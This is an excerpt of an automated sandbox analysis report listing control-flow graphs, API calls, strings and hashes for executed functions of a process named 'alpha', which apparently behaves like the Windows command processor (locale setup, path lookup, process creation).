_IsNonwritableInCurrentImage 16747->16749 16748 7ff7e1dc8e3c 16756 7ff7e1dc37d8 GetCurrentThreadId OpenThread 16749->16756 16752->16747 16752->16748 16752->16749 16789 7ff7e1dc04f4 16756->16789 16758 7ff7e1dc3839 HeapSetInformation RegOpenKeyExW 16759 7ff7e1dce9f8 RegQueryValueExW RegCloseKey 16758->16759 16760 7ff7e1dc388d 16758->16760 16762 7ff7e1dcea41 GetThreadLocale 16759->16762 16761 7ff7e1dc5920 VirtualQuery VirtualQuery 16760->16761 16763 7ff7e1dc38ab GetConsoleOutputCP GetCPInfo 16761->16763 16776 7ff7e1dc3919 16762->16776 16763->16762 16764 7ff7e1dc38f1 memset 16763->16764 16764->16776 16765 7ff7e1dc4d5c 391 API calls 16765->16776 16766 7ff7e1db3240 166 API calls 16766->16776 16767 7ff7e1dc3948 _setjmp 16767->16776 16768 7ff7e1dceb27 _setjmp 16768->16776 16769 7ff7e1dd8530 370 API calls 16769->16776 16770 7ff7e1dc01b8 6 API calls 16770->16776 16771 7ff7e1dc4c1c 166 API calls 16771->16776 16772 7ff7e1dbdf60 481 API calls 16772->16776 16773 7ff7e1dceb71 _setmode 16773->16776 16774 7ff7e1dc0580 12 API calls 16777 7ff7e1dc398b GetConsoleOutputCP GetCPInfo 16774->16777 16775 7ff7e1dc86f0 182 API calls 16775->16776 16776->16759 16776->16765 16776->16766 16776->16767 16776->16768 16776->16769 16776->16770 16776->16771 16776->16772 16776->16773 16776->16774 16776->16775 16778 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 16776->16778 16780 7ff7e1dbbe00 647 API calls 16776->16780 16781 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 16776->16781 16779 7ff7e1dc04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16777->16779 16778->16776 16779->16776 16780->16776 16782 7ff7e1dcebbe GetConsoleOutputCP GetCPInfo 16781->16782 16783 7ff7e1dc04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16782->16783 16784 7ff7e1dcebe6 16783->16784 16785 7ff7e1dbbe00 647 API calls 16784->16785 16786 7ff7e1dc0580 12 API calls 16784->16786 16785->16784 16787 7ff7e1dcebfc GetConsoleOutputCP GetCPInfo 16786->16787 16788 7ff7e1dc04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16787->16788 16788->16776 16790 7ff7e1dc0504 16789->16790 16791 7ff7e1dc051e GetModuleHandleW 16790->16791 16792 7ff7e1dc054d GetProcAddress 16790->16792 16793 7ff7e1dc056c SetThreadLocale 16790->16793 16791->16790 16792->16790

                                                      Executed Functions

                                                      Function 00007FF7E1DC0A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                      • API String ID: 3305344409-4288247545
                                                      • Opcode ID: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                      • Instruction ID: 792d6073e1623914c260ae244dc1910add6848bb42fc3424631bdf3e8537c91b
                                                      • Opcode Fuzzy Hash: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                      • Instruction Fuzzy Hash: C342F665A08A8285EB14EB1198023B9E7A1FF85794FC44A32DD1E877D4DFBCE144C3A2
                                                      Function 00007FF7E1DBAA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 216 7ff7e1dbaa54-7ff7e1dbaa98 call 7ff7e1dbcd90 219 7ff7e1dbaa9e 216->219 220 7ff7e1dcbf5a-7ff7e1dcbf70 call 7ff7e1dc4c1c call 7ff7e1dbff70 216->220 221 7ff7e1dbaaa5-7ff7e1dbaaa8 219->221 223 7ff7e1dbacde-7ff7e1dbad00 221->223 224 7ff7e1dbaaae-7ff7e1dbaac8 wcschr 221->224 230 7ff7e1dbad06 223->230 224->223 227 7ff7e1dbaace-7ff7e1dbaae9 towlower 224->227 227->223 229 7ff7e1dbaaef-7ff7e1dbaaf3 227->229 233 7ff7e1dbaaf9-7ff7e1dbaafd 229->233 234 7ff7e1dcbeb7-7ff7e1dcbec4 call 7ff7e1ddeaf0 229->234 231 7ff7e1dbad0d-7ff7e1dbad1f 230->231 237 7ff7e1dbad22-7ff7e1dbad2a call 7ff7e1dc13e0 231->237 235 7ff7e1dcbbcf 233->235 236 7ff7e1dbab03-7ff7e1dbab07 233->236 246 7ff7e1dcbf43-7ff7e1dcbf59 call 7ff7e1dc4c1c 234->246 247 7ff7e1dcbec6-7ff7e1dcbed8 call 7ff7e1db3240 234->247 249 7ff7e1dcbbde 235->249 239 7ff7e1dbab09-7ff7e1dbab0d 236->239 240 7ff7e1dbab7d-7ff7e1dbab81 236->240 237->221 243 7ff7e1dcbe63 239->243 244 7ff7e1dbab13-7ff7e1dbab17 239->244 240->243 248 7ff7e1dbab87-7ff7e1dbab95 240->248 255 7ff7e1dcbe72-7ff7e1dcbe88 call 7ff7e1db3278 call 7ff7e1dc4c1c 243->255 244->240 250 7ff7e1dbab19-7ff7e1dbab1d 244->250 246->220 247->246 263 7ff7e1dcbeda-7ff7e1dcbee9 call 7ff7e1db3240 247->263 253 7ff7e1dbab98-7ff7e1dbaba0 248->253 259 7ff7e1dcbbea-7ff7e1dcbbec 249->259 250->249 254 7ff7e1dbab23-7ff7e1dbab27 250->254 253->253 258 7ff7e1dbaba2-7ff7e1dbabb3 call 7ff7e1dbcd90 253->258 254->259 261 7ff7e1dbab2d-7ff7e1dbab31 254->261 283 7ff7e1dcbe89-7ff7e1dcbe8c 255->283 258->220 269 7ff7e1dbabb9-7ff7e1dbabde call 7ff7e1dc13e0 call 7ff7e1dc33a8 258->269 265 7ff7e1dcbbf8-7ff7e1dcbc01 259->265 261->230 266 7ff7e1dbab37-7ff7e1dbab3b 261->266 277 7ff7e1dcbef3-7ff7e1dcbef9 263->277 278 7ff7e1dcbeeb-7ff7e1dcbef1 263->278 265->231 266->265 270 7ff7e1dbab41-7ff7e1dbab45 266->270 305 7ff7e1dbac75 269->305 306 7ff7e1dbabe4-7ff7e1dbabe7 269->306 274 7ff7e1dcbc06-7ff7e1dcbc2a call 7ff7e1dc13e0 270->274 275 7ff7e1dbab4b-7ff7e1dbab4f 270->275 294 7ff7e1dcbc2c-7ff7e1dcbc4c _wcsnicmp 274->294 295 7ff7e1dcbc5a-7ff7e1dcbc61 274->295 281 7ff7e1dbad2f-7ff7e1dbad33 275->281 282 7ff7e1dbab55-7ff7e1dbab78 call 7ff7e1dc13e0 275->282 277->246 284 7ff7e1dcbefb-7ff7e1dcbf0d call 7ff7e1db3240 277->284 278->246 278->277 288 7ff7e1dcbc66-7ff7e1dcbc8a call 7ff7e1dc13e0 281->288 289 7ff7e1dbad39-7ff7e1dbad3d 281->289 282->221 291 7ff7e1dcbe92-7ff7e1dcbeaa call 7ff7e1db3278 call 7ff7e1dc4c1c 283->291 292 7ff7e1dbacbe 283->292 284->246 303 7ff7e1dcbf0f-7ff7e1dcbf21 call 7ff7e1db3240 284->303 324 7ff7e1dcbcc4-7ff7e1dcbcdc 288->324 325 7ff7e1dcbc8c-7ff7e1dcbcaa _wcsnicmp 288->325 297 7ff7e1dbad43-7ff7e1dbad49 289->297 298 7ff7e1dcbcde-7ff7e1dcbd02 call 7ff7e1dc13e0 289->298 337 7ff7e1dcbeab-7ff7e1dcbeb6 call 7ff7e1dc4c1c 291->337 301 7ff7e1dbacc0-7ff7e1dbacc7 292->301 294->295 304 7ff7e1dcbc4e-7ff7e1dcbc55 294->304 309 7ff7e1dcbd31-7ff7e1dcbd4f _wcsnicmp 295->309 307 7ff7e1dbad4f-7ff7e1dbad68 297->307 308 7ff7e1dcbd5e-7ff7e1dcbd65 297->308 331 7ff7e1dcbd04-7ff7e1dcbd24 _wcsnicmp 298->331 332 7ff7e1dcbd2a 298->332 301->301 311 7ff7e1dbacc9-7ff7e1dbacda 301->311 303->246 339 7ff7e1dcbf23-7ff7e1dcbf35 call 7ff7e1db3240 303->339 319 7ff7e1dcbbb3-7ff7e1dcbbb7 304->319 316 7ff7e1dbac77-7ff7e1dbac7f 305->316 306->292 321 7ff7e1dbabed-7ff7e1dbac0b call 7ff7e1dbcd90 * 2 306->321 322 7ff7e1dbad6a 307->322 323 7ff7e1dbad6d-7ff7e1dbad70 307->323 308->307 320 7ff7e1dcbd6b-7ff7e1dcbd73 308->320 317 7ff7e1dcbd55 309->317 318 7ff7e1dcbbc2-7ff7e1dcbbca 309->318 311->223 316->292 328 7ff7e1dbac81-7ff7e1dbac85 316->328 317->308 318->221 333 7ff7e1dcbbba-7ff7e1dcbbbd call 7ff7e1dc13e0 319->333 334 7ff7e1dcbd79-7ff7e1dcbd8b iswxdigit 320->334 335 7ff7e1dcbe4a-7ff7e1dcbe5e 320->335 321->337 358 7ff7e1dbac11-7ff7e1dbac14 321->358 322->323 323->237 324->309 325->324 329 7ff7e1dcbcac-7ff7e1dcbcbf 325->329 340 7ff7e1dbac88-7ff7e1dbac8f 328->340 329->319 331->332 338 7ff7e1dcbbac 331->338 332->309 333->318 334->335 342 7ff7e1dcbd91-7ff7e1dcbda3 iswxdigit 334->342 335->333 337->234 338->319 339->246 354 7ff7e1dcbf37-7ff7e1dcbf3e call 7ff7e1db3240 339->354 340->340 345 7ff7e1dbac91-7ff7e1dbac94 340->345 342->335 347 7ff7e1dcbda9-7ff7e1dcbdbb iswxdigit 342->347 345->292 351 7ff7e1dbac96-7ff7e1dbacaa wcsrchr 345->351 347->335 352 7ff7e1dcbdc1-7ff7e1dcbdd7 iswdigit 347->352 351->292 355 7ff7e1dbacac-7ff7e1dbacb9 call 7ff7e1dc1300 351->355 356 7ff7e1dcbddf-7ff7e1dcbdeb towlower 352->356 357 7ff7e1dcbdd9-7ff7e1dcbddd 352->357 354->246 355->292 361 7ff7e1dcbdee-7ff7e1dcbe0f iswdigit 356->361 357->361 358->337 362 7ff7e1dbac1a-7ff7e1dbac33 memset 358->362 363 7ff7e1dcbe11-7ff7e1dcbe15 361->363 364 7ff7e1dcbe17-7ff7e1dcbe23 towlower 361->364 362->305 365 7ff7e1dbac35-7ff7e1dbac4b wcschr 362->365 366 7ff7e1dcbe26-7ff7e1dcbe45 call 7ff7e1dc13e0 363->366 364->366 365->305 367 7ff7e1dbac4d-7ff7e1dbac54 365->367 366->335 368 7ff7e1dbad72-7ff7e1dbad91 wcschr 367->368 369 7ff7e1dbac5a-7ff7e1dbac6f wcschr 367->369 371 7ff7e1dbaf03-7ff7e1dbaf07 368->371 372 7ff7e1dbad97-7ff7e1dbadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff7e1dbadb2-7ff7e1dbadc7 wcschr 372->373 373->371 374 7ff7e1dbadcd-7ff7e1dbade2 wcschr 373->374 374->371 375 7ff7e1dbade8-7ff7e1dbadfd wcschr 374->375 375->371 376 7ff7e1dbae03-7ff7e1dbae18 wcschr 375->376 376->371 377 7ff7e1dbae1e-7ff7e1dbae21 376->377 378 7ff7e1dbae24-7ff7e1dbae27 377->378 378->371 379 7ff7e1dbae2d-7ff7e1dbae40 iswspace 378->379 380 7ff7e1dbae42-7ff7e1dbae49 379->380 381 7ff7e1dbae4b-7ff7e1dbae5e 379->381 380->378 382 7ff7e1dbae66-7ff7e1dbae6d 381->382 382->382 383 7ff7e1dbae6f-7ff7e1dbae77 382->383 383->255 384 7ff7e1dbae7d-7ff7e1dbae97 call 7ff7e1dc13e0 383->384 387 7ff7e1dbae9a-7ff7e1dbaea4 384->387 388 7ff7e1dbaea6-7ff7e1dbaead 387->388 389 7ff7e1dbaebc-7ff7e1dbaef8 call 7ff7e1dc0a6c call 7ff7e1dbff70 * 2 387->389 388->389 390 7ff7e1dbaeaf-7ff7e1dbaeba 388->390 389->316 397 7ff7e1dbaefe 389->397 390->387 390->389 397->283
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                      • String ID: :$:$:$:ON$OFF
                                                      • API String ID: 972821348-467788257
                                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                      • Instruction ID: f7e4fc3e9d10e990a3eb59c9c5e60b5983400714d21d22fa8d52f268e6204d51
                                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                      • Instruction Fuzzy Hash: 22229F21E0864296EB28FF2595163B9E691FF49B81FC88437C90E47394DFBCE444C7A2
                                                      Function 00007FF7E1DC51EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 398 7ff7e1dc51ec-7ff7e1dc5248 call 7ff7e1dc5508 GetLocaleInfoW 401 7ff7e1dcef32-7ff7e1dcef3c 398->401 402 7ff7e1dc524e-7ff7e1dc5272 GetLocaleInfoW 398->402 405 7ff7e1dcef3f-7ff7e1dcef49 401->405 403 7ff7e1dc5295-7ff7e1dc52b9 GetLocaleInfoW 402->403 404 7ff7e1dc5274-7ff7e1dc527a 402->404 408 7ff7e1dc52de-7ff7e1dc5305 GetLocaleInfoW 403->408 409 7ff7e1dc52bb-7ff7e1dc52c3 403->409 406 7ff7e1dc5280-7ff7e1dc5286 404->406 407 7ff7e1dc54f7-7ff7e1dc54f9 404->407 410 7ff7e1dcef61-7ff7e1dcef6c 405->410 411 7ff7e1dcef4b-7ff7e1dcef52 405->411 406->407 412 7ff7e1dc528c-7ff7e1dc528f 406->412 407->401 415 7ff7e1dc5321-7ff7e1dc5343 GetLocaleInfoW 408->415 416 7ff7e1dc5307-7ff7e1dc531b 408->416 413 7ff7e1dcef75-7ff7e1dcef78 409->413 414 7ff7e1dc52c9-7ff7e1dc52d7 409->414 410->413 411->410 417 7ff7e1dcef54-7ff7e1dcef5f 411->417 412->403 418 7ff7e1dcef99-7ff7e1dcefa3 413->418 419 7ff7e1dcef7a-7ff7e1dcef7d 413->419 414->408 420 7ff7e1dcefaf-7ff7e1dcefb9 415->420 421 7ff7e1dc5349-7ff7e1dc536e GetLocaleInfoW 415->421 416->415 417->405 417->410 418->420 419->408 422 7ff7e1dcef83-7ff7e1dcef8d 419->422 423 7ff7e1dcefbc-7ff7e1dcefc6 420->423 424 7ff7e1dc5374-7ff7e1dc5396 GetLocaleInfoW 421->424 425 7ff7e1dceff2-7ff7e1dceffc 421->425 422->418 426 7ff7e1dcefde-7ff7e1dcefe9 423->426 427 7ff7e1dcefc8-7ff7e1dcefcf 423->427 429 7ff7e1dcf035-7ff7e1dcf03f 424->429 430 7ff7e1dc539c-7ff7e1dc53be GetLocaleInfoW 424->430 428 7ff7e1dcefff-7ff7e1dcf009 425->428 426->425 427->426 432 7ff7e1dcefd1-7ff7e1dcefdc 427->432 433 7ff7e1dcf021-7ff7e1dcf02c 428->433 434 7ff7e1dcf00b-7ff7e1dcf012 428->434 431 7ff7e1dcf042-7ff7e1dcf04c 429->431 435 7ff7e1dc53c4-7ff7e1dc53e6 GetLocaleInfoW 430->435 436 7ff7e1dcf078-7ff7e1dcf082 430->436 439 7ff7e1dcf064-7ff7e1dcf06f 431->439 440 7ff7e1dcf04e-7ff7e1dcf055 431->440 432->423 432->426 433->429 434->433 442 7ff7e1dcf014-7ff7e1dcf01f 434->442 437 7ff7e1dcf0bb-7ff7e1dcf0c5 435->437 438 7ff7e1dc53ec-7ff7e1dc540e GetLocaleInfoW 435->438 441 7ff7e1dcf085-7ff7e1dcf08f 436->441 448 7ff7e1dcf0c8-7ff7e1dcf0d2 437->448 443 7ff7e1dc5414-7ff7e1dc5436 GetLocaleInfoW 438->443 444 7ff7e1dcf0fe-7ff7e1dcf108 438->444 439->436 440->439 445 7ff7e1dcf057-7ff7e1dcf062 440->445 446 7ff7e1dcf091-7ff7e1dcf098 441->446 447 7ff7e1dcf0a7-7ff7e1dcf0b2 441->447 442->428 442->433 451 7ff7e1dcf141-7ff7e1dcf14b 443->451 452 7ff7e1dc543c-7ff7e1dc545e GetLocaleInfoW 443->452 453 7ff7e1dcf10b-7ff7e1dcf115 444->453 445->431 445->439 446->447 454 7ff7e1dcf09a-7ff7e1dcf0a5 446->454 447->437 449 7ff7e1dcf0d4-7ff7e1dcf0db 448->449 450 7ff7e1dcf0ea-7ff7e1dcf0f5 448->450 449->450 455 7ff7e1dcf0dd-7ff7e1dcf0e8 449->455 450->444 460 7ff7e1dcf14e-7ff7e1dcf158 451->460 456 7ff7e1dcf184-7ff7e1dcf18b 452->456 457 7ff7e1dc5464-7ff7e1dc5486 GetLocaleInfoW 452->457 458 7ff7e1dcf12d-7ff7e1dcf138 453->458 459 7ff7e1dcf117-7ff7e1dcf11e 453->459 454->441 454->447 455->448 455->450 461 7ff7e1dcf18e-7ff7e1dcf198 456->461 462 7ff7e1dcf1c4-7ff7e1dcf1ce 457->462 463 7ff7e1dc548c-7ff7e1dc54ae GetLocaleInfoW 457->463 458->451 459->458 464 7ff7e1dcf120-7ff7e1dcf12b 459->464 465 7ff7e1dcf170-7ff7e1dcf17b 460->465 466 7ff7e1dcf15a-7ff7e1dcf161 460->466 467 7ff7e1dcf1b0-7ff7e1dcf1bb 461->467 468 7ff7e1dcf19a-7ff7e1dcf1a1 461->468 471 7ff7e1dcf1d1-7ff7e1dcf1db 462->471 469 7ff7e1dc54b4-7ff7e1dc54f5 setlocale call 7ff7e1dc8f80 463->469 470 7ff7e1dcf207-7ff7e1dcf20e 463->470 464->453 464->458 465->456 466->465 472 7ff7e1dcf163-7ff7e1dcf16e 466->472 467->462 468->467 473 7ff7e1dcf1a3-7ff7e1dcf1ae 468->473 477 7ff7e1dcf211-7ff7e1dcf21b 470->477 475 7ff7e1dcf1f3-7ff7e1dcf1fe 471->475 476 7ff7e1dcf1dd-7ff7e1dcf1e4 471->476 472->460 472->465 473->461 473->467 475->470 476->475 479 7ff7e1dcf1e6-7ff7e1dcf1f1 476->479 480 7ff7e1dcf233-7ff7e1dcf23e 477->480 481 7ff7e1dcf21d-7ff7e1dcf224 477->481 479->471 479->475 481->480 482 7ff7e1dcf226-7ff7e1dcf231 481->482 482->477 482->480
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                      • API String ID: 1351325837-2236139042
                                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                      • Instruction ID: 13585ba12c7c99d986d99022a582b6112966797bb33f082acd547125e474cb64
                                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                      • Instruction Fuzzy Hash: BEF17966B0874285EF25EF11D9023B9A6A5FF49B81FC48537CA0D47294EFBCE505C3A2
                                                      Function 00007FF7E1DC4224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 483 7ff7e1dc4224-7ff7e1dc42a5 InitializeProcThreadAttributeList 484 7ff7e1dcecd4-7ff7e1dcecee GetLastError call 7ff7e1dd9eec 483->484 485 7ff7e1dc42ab-7ff7e1dc42e5 UpdateProcThreadAttribute 483->485 492 7ff7e1dced1e 484->492 487 7ff7e1dcecf0-7ff7e1dced19 GetLastError call 7ff7e1dd9eec DeleteProcThreadAttributeList 485->487 488 7ff7e1dc42eb-7ff7e1dc43c6 memset * 2 GetStartupInfoW call 7ff7e1dc3a90 call 7ff7e1dbb900 485->488 487->492 497 7ff7e1dc4638-7ff7e1dc4644 _local_unwind 488->497 498 7ff7e1dc43cc-7ff7e1dc43d3 488->498 499 7ff7e1dc4649-7ff7e1dc4650 497->499 498->499 500 7ff7e1dc43d9-7ff7e1dc43dc 498->500 499->500 503 7ff7e1dc4656-7ff7e1dc465d 499->503 501 7ff7e1dc4415-7ff7e1dc4424 call 7ff7e1dc5a68 500->501 502 7ff7e1dc43de-7ff7e1dc43f5 wcsrchr 500->502 510 7ff7e1dc442a-7ff7e1dc4486 CreateProcessW 501->510 511 7ff7e1dc4589-7ff7e1dc4590 501->511 502->501 504 7ff7e1dc43f7-7ff7e1dc440f lstrcmpW 502->504 503->501 506 7ff7e1dc4663 503->506 504->501 507 7ff7e1dc4668-7ff7e1dc466d call 7ff7e1dd9044 504->507 506->500 507->501 513 7ff7e1dc448b-7ff7e1dc448f 510->513 511->510 514 7ff7e1dc4596-7ff7e1dc45fa CreateProcessAsUserW 511->514 515 7ff7e1dc4672-7ff7e1dc4682 GetLastError 513->515 516 7ff7e1dc4495-7ff7e1dc44c7 CloseHandle call 7ff7e1dc498c 513->516 514->513 518 7ff7e1dc468d-7ff7e1dc4694 515->518 516->518 522 7ff7e1dc44cd-7ff7e1dc44e5 516->522 520 7ff7e1dc46a2-7ff7e1dc46ac 518->520 521 7ff7e1dc4696-7ff7e1dc46a0 518->521 523 7ff7e1dc4705-7ff7e1dc4707 520->523 524 7ff7e1dc46ae-7ff7e1dc46b5 call 7ff7e1dc97bc 520->524 521->520 521->524 525 7ff7e1dc47a3-7ff7e1dc47a9 522->525 526 7ff7e1dc44eb-7ff7e1dc44f2 522->526 523->522 530 7ff7e1dc470d-7ff7e1dc472a call 7ff7e1dbcd90 523->530 540 7ff7e1dc4703 524->540 541 7ff7e1dc46b7-7ff7e1dc4701 call 7ff7e1e0c038 524->541 527 7ff7e1dc45ff-7ff7e1dc4607 526->527 528 7ff7e1dc44f8-7ff7e1dc4507 526->528 527->528 531 7ff7e1dc460d 527->531 532 7ff7e1dc4612-7ff7e1dc4616 528->532 533 7ff7e1dc450d-7ff7e1dc4553 call 7ff7e1dc5cb4 call 7ff7e1dc33f0 call 7ff7e1dc498c 528->533 548 7ff7e1dc473d-7ff7e1dc4767 call 7ff7e1dc13e0 call 7ff7e1dd9eec call 7ff7e1dbff70 _local_unwind 530->548 549 7ff7e1dc472c-7ff7e1dc4738 _local_unwind 530->549 536 7ff7e1dc476c-7ff7e1dc4773 531->536 538 7ff7e1dc47d7-7ff7e1dc47df 532->538 539 7ff7e1dc461c-7ff7e1dc4633 532->539 565 7ff7e1dc4558-7ff7e1dc455e 533->565 536->528 546 7ff7e1dc4779-7ff7e1dc4780 536->546 543 7ff7e1dc47f2-7ff7e1dc483c call 7ff7e1dbff70 DeleteProcThreadAttributeList call 7ff7e1dc8f80 538->543 544 7ff7e1dc47e1-7ff7e1dc47ed CloseHandle 538->544 539->543 540->523 541->523 544->543 546->528 552 7ff7e1dc4786-7ff7e1dc4789 546->552 548->536 549->548 552->528 557 7ff7e1dc478f-7ff7e1dc4792 552->557 557->525 561 7ff7e1dc4794-7ff7e1dc479d call 7ff7e1dda250 557->561 561->525 561->528 568 7ff7e1dc4564-7ff7e1dc4579 call 7ff7e1dc498c 565->568 569 7ff7e1dc47ae-7ff7e1dc47ca call 7ff7e1dc33f0 565->569 568->543 576 7ff7e1dc457f-7ff7e1dc4584 call 7ff7e1dda920 568->576 569->538 576->543
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                      • API String ID: 388421343-2905461000
                                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                      • Instruction ID: 9b4e86260509a5bce545c06528ef87ae747cf0a7992c602a34ff19da5a651ee2
                                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                      • Instruction Fuzzy Hash: B1F15D32A08B8295EB61EB11E4427BAF7A4FB89780F904537D94D42754DFBCE444CBA2
                                                      Function 00007FF7E1DC5554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
